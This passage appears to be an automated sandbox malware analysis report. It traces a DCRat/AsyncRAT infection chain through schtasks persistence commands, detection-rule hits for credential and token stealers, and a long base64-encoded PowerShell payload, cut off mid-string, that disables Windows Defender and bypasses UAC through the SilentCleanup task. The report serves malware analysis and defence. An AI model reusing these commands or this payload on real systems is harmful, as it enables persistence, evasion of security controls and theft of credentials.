File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	09:33:56
Start date:	23/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"'
Imagebase:	0x7ff6b2900000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	09:33:56
Start date:	23/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"'
Imagebase:	0x7ff6b2900000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	09:33:56
Start date:	23/05/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 3
Imagebase:	0x7ff71d750000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	09:33:57
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Roaming\Loaader.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Loaader.exe
Imagebase:	0x980000
File size:	64'512 bytes
MD5 hash:	B8D455465260A845DB35492FDA5A8888
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000012.00000002.2097619560.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000012.00000002.2087235357.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Loaader.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Roaming\Loaader.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: C:\Users\user\AppData\Roaming\Loaader.exe, Author: ditekSHen
Antivirus matches:	Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	09:33:57
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Roaming\Loader.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Loader.exe
Imagebase:	0xf50000
File size:	75'776 bytes
MD5 hash:	7AC0ADF482250172280DEFEC7A7054DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Loader.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Roaming\Loader.exe, Author: ditekSHen
Antivirus matches:	Detection: 82%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	09:33:59
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Roaming\Loader.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Loader.exe"
Imagebase:	0x6d0000
File size:	75'776 bytes
MD5 hash:	7AC0ADF482250172280DEFEC7A7054DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts, Description: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc., Source: 00000014.00000002.2814130598.000000001D000000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	09:33:59
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Roaming\Loaader.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Loaader.exe"
Imagebase:	0xda0000
File size:	64'512 bytes
MD5 hash:	B8D455465260A845DB35492FDA5A8888
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000015.00000002.3282228143.000000000313B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000015.00000002.3282228143.0000000003126000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000015.00000002.3248245047.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000015.00000002.3532252741.000000001BC21000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000015.00000002.3532252741.000000001BBB4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000015.00000002.3282228143.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	09:34:03
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Local\Temp\WinDefend.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\WinDefend.exe"
Imagebase:	0xb40000
File size:	89'088 bytes
MD5 hash:	5FC6A541845FDAFB597DDFB98FA28B54
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	09:34:11
Start date:	23/05/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAA